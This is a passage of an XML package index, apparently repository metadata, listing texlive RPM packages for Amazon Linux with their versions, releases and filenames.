arch="noarch"><filename>Packages/texlive-txfonts-svn15878.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-gsftopk-bin" version="svn26509.0" release="45.20130427_r30134.amzn1" epoch="2" arch="x86_64"><filename>Packages/texlive-gsftopk-bin-svn26509.0-45.20130427_r30134.amzn1.x86_64.rpm</filename></package><package name="texlive-etex-doc" version="svn22198.2.1" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-etex-doc-svn22198.2.1-45.amzn1.noarch.rpm</filename></package><package name="texlive-mh" version="svn29420.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-mh-svn29420.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-cm" version="svn29581.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-cm-svn29581.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-csquotes" version="svn24393.5.1d" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-csquotes-svn24393.5.1d-45.amzn1.noarch.rpm</filename></package><package name="texlive-polyglossia" version="svn26163.v1.2.1" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-polyglossia-svn26163.v1.2.1-45.amzn1.noarch.rpm</filename></package><package name="texlive-pst-fill-doc" version="svn15878.1.01" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-pst-fill-doc-svn15878.1.01-45.amzn1.noarch.rpm</filename></package><package name="texlive-mparhack" version="svn15878.1.4" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-mparhack-svn15878.1.4-45.amzn1.noarch.rpm</filename></package><package name="texlive-wrapfig" version="svn22048.3.6" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-wrapfig-svn22048.3.6-45.amzn1.noarch.rpm</filename></package><package name="texlive-etex" version="svn22198.2.1" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-etex-svn22198.2.1-45.amzn1.noarch.rpm</filename></package><package name="texlive-psnfss" version="svn23394.9.2a" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-psnfss-svn23394.9.2a-45.amzn1.noarch.rpm</filename></package><package name="texlive-fontware-bin" version="svn26509.0" release="45.20130427_r30134.amzn1" epoch="2" arch="x86_64"><filename>Packages/texlive-fontware-bin-svn26509.0-45.20130427_r30134.amzn1.x86_64.rpm</filename></package><package name="texlive-mnsymbol-doc" version="svn18651.1.4" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-mnsymbol-doc-svn18651.1.4-45.amzn1.noarch.rpm</filename></package><package name="texlive-fp" version="svn15878.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-fp-svn15878.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-iftex" version="svn29654.0.2" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-iftex-svn29654.0.2-45.amzn1.noarch.rpm</filename></package><package name="texlive-psnfss-doc" version="svn23394.9.2a" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-psnfss-doc-svn23394.9.2a-45.amzn1.noarch.rpm</filename></package><package name="texlive-fancybox-doc" version="svn18304.1.4" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-fancybox-doc-svn18304.1.4-45.amzn1.noarch.rpm</filename></package><package name="texlive-pst-3d" version="svn17257.1.10" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-pst-3d-svn17257.1.10-45.amzn1.noarch.rpm</filename></package><package name="texlive-parskip" version="svn19963.2.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-parskip-svn19963.2.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-lualatex-math-doc" version="svn29346.1.2" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-lualatex-math-doc-svn29346.1.2-45.amzn1.noarch.rpm</filename></package><package name="texlive-was" version="svn21439.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-was-svn21439.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-lualatex-math" version="svn29346.1.2" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-lualatex-math-svn29346.1.2-45.amzn1.noarch.rpm</filename></package><package name="texlive-textpos" version="svn28261.1.7h" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-textpos-svn28261.1.7h-45.amzn1.noarch.rpm</filename></package><package name="texlive-pst-slpe-doc" version="svn24391.1.31" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-pst-slpe-doc-svn24391.1.31-45.amzn1.noarch.rpm</filename></package><package name="texlive-euenc-doc" version="svn19795.0.1h" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-euenc-doc-svn19795.0.1h-45.amzn1.noarch.rpm</filename></package><package name="texlive-titlesec-doc" version="svn24852.2.10.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-titlesec-doc-svn24852.2.10.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-thumbpdf-doc" version="svn26689.3.15" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-thumbpdf-doc-svn26689.3.15-45.amzn1.noarch.rpm</filename></package><package name="texlive-t2" version="svn29349.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-t2-svn29349.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-unisugar-doc" version="svn22357.0.92" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-unisugar-doc-svn22357.0.92-45.amzn1.noarch.rpm</filename></package><package name="texlive-times" version="svn28614.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-times-svn28614.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-showexpl" version="svn27790.v0.3j" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-showexpl-svn27790.v0.3j-45.amzn1.noarch.rpm</filename></package><package name="texlive-sansmath-doc" version="svn17997.1.1" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-sansmath-doc-svn17997.1.1-45.amzn1.noarch.rpm</filename></package><package name="texlive-crop-doc" version="svn15878.1.5" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-crop-doc-svn15878.1.5-45.amzn1.noarch.rpm</filename></package><package name="texlive-pslatex" version="svn16416.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-pslatex-svn16416.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-xunicode-doc" version="svn23897.0.981" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-xunicode-doc-svn23897.0.981-45.amzn1.noarch.rpm</filename></package><package name="texlive-cns" version="svn15878.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-cns-svn15878.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-luaotfload-doc" version="svn26718.1.26" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-luaotfload-doc-svn26718.1.26-45.amzn1.noarch.rpm</filename></package><package name="texlive-dvipdfm-bin" version="svn13663.0" release="45.20130427_r30134.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-dvipdfm-bin-svn13663.0-45.20130427_r30134.amzn1.noarch.rpm</filename></package><package name="texlive-memoir" version="svn21638.3.6j_patch_6.0g" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-memoir-svn21638.3.6j_patch_6.0g-45.amzn1.noarch.rpm</filename></package><package name="texlive-dvips-doc" version="svn29585.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-dvips-doc-svn29585.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-amsmath-doc" version="svn29327.2.14" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-amsmath-doc-svn29327.2.14-45.amzn1.noarch.rpm</filename></package><package name="texlive-mptopdf" version="svn26689.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-mptopdf-svn26689.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-paralist-doc" version="svn15878.2.3b" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-paralist-doc-svn15878.2.3b-45.amzn1.noarch.rpm</filename></package><package name="texlive-lastpage-doc" version="svn28985.1.2l" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-lastpage-doc-svn28985.1.2l-45.amzn1.noarch.rpm</filename></package><package name="texlive-l3kernel" version="svn29409.SVN_4469" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-l3kernel-svn29409.SVN_4469-45.amzn1.noarch.rpm</filename></package><package name="texlive-babelbib" version="svn25245.1.31" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-babelbib-svn25245.1.31-45.amzn1.noarch.rpm</filename></package><package name="texlive-caption-doc" version="svn29026.3.3__2013_02_03_" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-caption-doc-svn29026.3.3__2013_02_03_-45.amzn1.noarch.rpm</filename></package><package name="texlive-ae" version="svn15878.1.4" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-ae-svn15878.1.4-45.amzn1.noarch.rpm</filename></package><package name="texlive-pst-math-doc" version="svn20176.0.61" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-pst-math-doc-svn20176.0.61-45.amzn1.noarch.rpm</filename></package><package name="texlive-enumitem" version="svn24146.3.5.2" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-enumitem-svn24146.3.5.2-45.amzn1.noarch.rpm</filename></package><package name="texlive-was-doc" version="svn21439.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-was-doc-svn21439.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-multido-doc" version="svn18302.1.42" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-multido-doc-svn18302.1.42-45.amzn1.noarch.rpm</filename></package><package name="texlive-eepic" version="svn15878.1.1e" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-eepic-svn15878.1.1e-45.amzn1.noarch.rpm</filename></package><package name="texlive-hyphen-base" version="svn29197.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-hyphen-base-svn29197.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-fixlatvian-doc" version="svn21631.1a" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-fixlatvian-doc-svn21631.1a-45.amzn1.noarch.rpm</filename></package><package name="texlive-pdfpages" version="svn27574.0.4t" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-pdfpages-svn27574.0.4t-45.amzn1.noarch.rpm</filename></package><package name="texlive-fontspec-doc" version="svn29412.v2.3a" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-fontspec-doc-svn29412.v2.3a-45.amzn1.noarch.rpm</filename></package><package name="texlive-luaotfload" version="svn26718.1.26" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-luaotfload-svn26718.1.26-45.amzn1.noarch.rpm</filename></package><package name="texlive-caption" version="svn29026.3.3__2013_02_03_" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-caption-svn29026.3.3__2013_02_03_-45.amzn1.noarch.rpm</filename></package><package name="texlive-fontspec" version="svn29412.v2.3a" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-fontspec-svn29412.v2.3a-45.amzn1.noarch.rpm</filename></package><package name="texlive-fpl" version="svn15878.1.002" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-fpl-svn15878.1.002-45.amzn1.noarch.rpm</filename></package><package name="texlive-kpathsea-bin" version="svn27347.0" release="45.20130427_r30134.amzn1" epoch="2" arch="x86_64"><filename>Packages/texlive-kpathsea-bin-svn27347.0-45.20130427_r30134.amzn1.x86_64.rpm</filename></package><package name="texlive-typehtml" version="svn17134.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-typehtml-svn17134.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-metafont" version="svn26689.2.718281" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-metafont-svn26689.2.718281-45.amzn1.noarch.rpm</filename></package><package name="texlive-xkeyval-doc" version="svn27995.2.6a" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-xkeyval-doc-svn27995.2.6a-45.amzn1.noarch.rpm</filename></package><package name="texlive-extsizes" version="svn17263.1.4a" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-extsizes-svn17263.1.4a-45.amzn1.noarch.rpm</filename></package><package name="texlive-wadalab-doc" version="svn22576.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-wadalab-doc-svn22576.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-lua-alt-getopt-doc" version="svn29349.0.7.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-lua-alt-getopt-doc-svn29349.0.7.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-preprint" version="svn16085.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-preprint-svn16085.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-texconfig-bin" version="svn27344.0" release="45.20130427_r30134.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-texconfig-bin-svn27344.0-45.20130427_r30134.amzn1.noarch.rpm</filename></package><package name="texlive-marginnote" version="svn25880.v1.1i" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-marginnote-svn25880.v1.1i-45.amzn1.noarch.rpm</filename></package><package name="texlive-xmltex-bin" version="svn3006.0" release="45.20130427_r30134.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-xmltex-bin-svn3006.0-45.20130427_r30134.amzn1.noarch.rpm</filename></package><package name="texlive-uhc-doc" version="svn16791.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-uhc-doc-svn16791.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-courier" version="svn28614.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-courier-svn28614.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-marginnote-doc" version="svn25880.v1.1i" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-marginnote-doc-svn25880.v1.1i-45.amzn1.noarch.rpm</filename></package><package name="texlive-wasy" version="svn15878.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-wasy-svn15878.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-dvipdfm-doc" version="svn26689.0.13.2d" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-dvipdfm-doc-svn26689.0.13.2d-45.amzn1.noarch.rpm</filename></package><package name="texlive-textcase-doc" version="svn15878.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-textcase-doc-svn15878.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-fncychap" version="svn20710.v1.34" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-fncychap-svn20710.v1.34-45.amzn1.noarch.rpm</filename></package><package name="texlive-framed" version="svn26789.0.96" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-framed-svn26789.0.96-45.amzn1.noarch.rpm</filename></package><package name="texlive-sectsty" version="svn15878.2.0.2" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-sectsty-svn15878.2.0.2-45.amzn1.noarch.rpm</filename></package><package name="texlive-uhc" version="svn16791.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-uhc-svn16791.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-euro" version="svn22191.1.1" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-euro-svn22191.1.1-45.amzn1.noarch.rpm</filename></package><package name="texlive-fp-doc" version="svn15878.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-fp-doc-svn15878.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-xecyr-doc" version="svn20221.1.1" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-xecyr-doc-svn20221.1.1-45.amzn1.noarch.rpm</filename></package><package name="texlive-pstricks-doc" version="svn29678.2.39" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-pstricks-doc-svn29678.2.39-45.amzn1.noarch.rpm</filename></package><package name="texlive-subfig-doc" version="svn15878.1.3" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-subfig-doc-svn15878.1.3-45.amzn1.noarch.rpm</filename></package><package name="texlive-underscore" version="svn18261.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-underscore-svn18261.0-45.amzn1.noarch.rpm</filename></package><package name="texlive" version="2012" release="45.20130427_r30134.amzn1" epoch="2" arch="x86_64"><filename>Packages/texlive-2012-45.20130427_r30134.amzn1.x86_64.rpm</filename></package><package name="texlive-anysize-doc" version="svn15878.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-anysize-doc-svn15878.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-sauerj" version="svn15878.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-sauerj-svn15878.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-texlive.infra-bin" version="svn22566.0" release="45.20130427_r30134.amzn1" epoch="2" arch="x86_64"><filename>Packages/texlive-texlive.infra-bin-svn22566.0-45.20130427_r30134.amzn1.x86_64.rpm</filename></package><package name="texlive-luatexbase-doc" version="svn22560.0.31" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-luatexbase-doc-svn22560.0.31-45.amzn1.noarch.rpm</filename></package><package name="texlive-tetex" version="svn29585.3.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-tetex-svn29585.3.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-charter-doc" version="svn15878.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-charter-doc-svn15878.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-wasy-doc" version="svn15878.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-wasy-doc-svn15878.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-pst-text" version="svn15878.1.00" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-pst-text-svn15878.1.00-45.amzn1.noarch.rpm</filename></package><package name="texlive-l3kernel-doc" version="svn29409.SVN_4469" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-l3kernel-doc-svn29409.SVN_4469-45.amzn1.noarch.rpm</filename></package><package name="texlive-pst-slpe" version="svn24391.1.31" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-pst-slpe-svn24391.1.31-45.amzn1.noarch.rpm</filename></package><package name="texlive-xetex-bin" version="svn26912.0" release="45.20130427_r30134.amzn1" epoch="2" arch="x86_64"><filename>Packages/texlive-xetex-bin-svn26912.0-45.20130427_r30134.amzn1.x86_64.rpm</filename></package><package name="texlive-anysize" version="svn15878.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-anysize-svn15878.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-attachfile" version="svn21866.v1.5b" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-attachfile-svn21866.v1.5b-45.amzn1.noarch.rpm</filename></package><package name="texlive-tex-bin" version="svn26912.0" release="45.20130427_r30134.amzn1" epoch="2" arch="x86_64"><filename>Packages/texlive-tex-bin-svn26912.0-45.20130427_r30134.amzn1.x86_64.rpm</filename></package><package name="texlive-ifluatex-doc" version="svn26725.1.3" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-ifluatex-doc-svn26725.1.3-45.amzn1.noarch.rpm</filename></package><package name="texlive-amsfonts-doc" version="svn29208.3.04" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-amsfonts-doc-svn29208.3.04-45.amzn1.noarch.rpm</filename></package><package name="texlive-metapost-doc" version="svn26689.1.212" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-metapost-doc-svn26689.1.212-45.amzn1.noarch.rpm</filename></package><package name="texlive-colortbl-doc" version="svn25394.v1.0a" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-colortbl-doc-svn25394.v1.0a-45.amzn1.noarch.rpm</filename></package><package name="texlive-amscls" version="svn29207.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-amscls-svn29207.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-mparhack-doc" version="svn15878.1.4" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-mparhack-doc-svn15878.1.4-45.amzn1.noarch.rpm</filename></package><package name="texlive-tex4ht" version="svn29474.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-tex4ht-svn29474.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-threeparttable-doc" version="svn17383.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-threeparttable-doc-svn17383.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-listings" version="svn15878.1.4" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-listings-svn15878.1.4-45.amzn1.noarch.rpm</filename></package><package name="texlive-bookman" version="svn28614.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-bookman-svn28614.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-lm" version="svn28119.2.004" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-lm-svn28119.2.004-45.amzn1.noarch.rpm</filename></package><package name="texlive-pst-math" version="svn20176.0.61" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-pst-math-svn20176.0.61-45.amzn1.noarch.rpm</filename></package><package name="texlive-texlive.infra" version="svn28217.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-texlive.infra-svn28217.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-cm-super-doc" version="svn15878.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-cm-super-doc-svn15878.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-bibtex" version="svn26689.0.99d" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-bibtex-svn26689.0.99d-45.amzn1.noarch.rpm</filename></package><package name="texlive-cjk" version="svn26296.4.8.3" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-cjk-svn26296.4.8.3-45.amzn1.noarch.rpm</filename></package><package name="texlive-stmaryrd" version="svn22027.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-stmaryrd-svn22027.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-ulem-doc" version="svn26785.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-ulem-doc-svn26785.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-bibtopic-doc" version="svn15878.1.1a" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-bibtopic-doc-svn15878.1.1a-45.amzn1.noarch.rpm</filename></package><package name="texlive-overpic" version="svn19712.0.53" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-overpic-svn19712.0.53-45.amzn1.noarch.rpm</filename></package><package name="texlive-appendix" version="svn15878.1.2b" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-appendix-svn15878.1.2b-45.amzn1.noarch.rpm</filename></package><package name="texlive-eso-pic" version="svn21515.2.0c" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-eso-pic-svn21515.2.0c-45.amzn1.noarch.rpm</filename></package><package name="texlive-mfware-bin" version="svn26509.0" release="45.20130427_r30134.amzn1" epoch="2" arch="x86_64"><filename>Packages/texlive-mfware-bin-svn26509.0-45.20130427_r30134.amzn1.x86_64.rpm</filename></package><package name="texlive-breakurl-doc" version="svn15878.1.30" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-breakurl-doc-svn15878.1.30-45.amzn1.noarch.rpm</filename></package><package name="texlive-changepage" version="svn15878.1.0c" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-changepage-svn15878.1.0c-45.amzn1.noarch.rpm</filename></package><package name="texlive-multido" version="svn18302.1.42" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-multido-svn18302.1.42-45.amzn1.noarch.rpm</filename></package><package name="texlive-cmextra" version="svn14075.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-cmextra-svn14075.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-xkeyval" version="svn27995.2.6a" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-xkeyval-svn27995.2.6a-45.amzn1.noarch.rpm</filename></package><package name="texlive-textcase" version="svn15878.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-textcase-svn15878.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-pst-blur-doc" version="svn15878.2.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-pst-blur-doc-svn15878.2.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-url-doc" version="svn16864.3.2" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-url-doc-svn16864.3.2-45.amzn1.noarch.rpm</filename></package><package name="texlive-type1cm" version="svn21820.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-type1cm-svn21820.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-makeindex-doc" version="svn26689.2.12" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-makeindex-doc-svn26689.2.12-45.amzn1.noarch.rpm</filename></package><package name="texlive-oberdiek-doc" version="svn26725.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-oberdiek-doc-svn26725.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-fontwrap-doc" version="svn15878.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-fontwrap-doc-svn15878.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-ltxmisc" version="svn21927.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-ltxmisc-svn21927.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-dvipdfmx-def" version="svn15878.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-dvipdfmx-def-svn15878.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-ucharclasses-doc" version="svn27820.2.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-ucharclasses-doc-svn27820.2.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-bigfoot-doc" version="svn15878.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-bigfoot-doc-svn15878.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-pstricks-add-doc" version="svn28750.3.59" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-pstricks-add-doc-svn28750.3.59-45.amzn1.noarch.rpm</filename></package><package name="texlive-ucs" version="svn27549.2.1" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-ucs-svn27549.2.1-45.amzn1.noarch.rpm</filename></package><package name="texlive-dvipng" version="svn26689.1.14" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-dvipng-svn26689.1.14-45.amzn1.noarch.rpm</filename></package><package name="texlive-mfware" version="svn26689.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-mfware-svn26689.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-pst-3d-doc" version="svn17257.1.10" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-pst-3d-doc-svn17257.1.10-45.amzn1.noarch.rpm</filename></package><package name="texlive-cm-lgc-doc" version="svn28250.0.5" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-cm-lgc-doc-svn28250.0.5-45.amzn1.noarch.rpm</filename></package><package name="texlive-xecjk-doc" version="svn28816.3.1.2" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-xecjk-doc-svn28816.3.1.2-45.amzn1.noarch.rpm</filename></package><package name="texlive-pst-node-doc" version="svn27799.1.25" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-pst-node-doc-svn27799.1.25-45.amzn1.noarch.rpm</filename></package><package name="texlive-pdftex-bin" version="svn27321.0" release="45.20130427_r30134.amzn1" epoch="2" arch="x86_64"><filename>Packages/texlive-pdftex-bin-svn27321.0-45.20130427_r30134.amzn1.x86_64.rpm</filename></package><package name="texlive-fpl-doc" version="svn15878.1.002" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-fpl-doc-svn15878.1.002-45.amzn1.noarch.rpm</filename></package><package name="texlive-ifmtarg-doc" version="svn19363.1.2a" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-ifmtarg-doc-svn19363.1.2a-45.amzn1.noarch.rpm</filename></package><package name="texlive-svn-prov" version="svn18017.3.1862" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-svn-prov-svn18017.3.1862-45.amzn1.noarch.rpm</filename></package><package name="texlive-utopia" version="svn15878.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-utopia-svn15878.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-fix2col" version="svn17133.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-fix2col-svn17133.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-kerkis" version="svn15878.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-kerkis-svn15878.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-hyperref-doc" version="svn28213.6.83m" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-hyperref-doc-svn28213.6.83m-45.amzn1.noarch.rpm</filename></package><package name="texlive-passivetex" 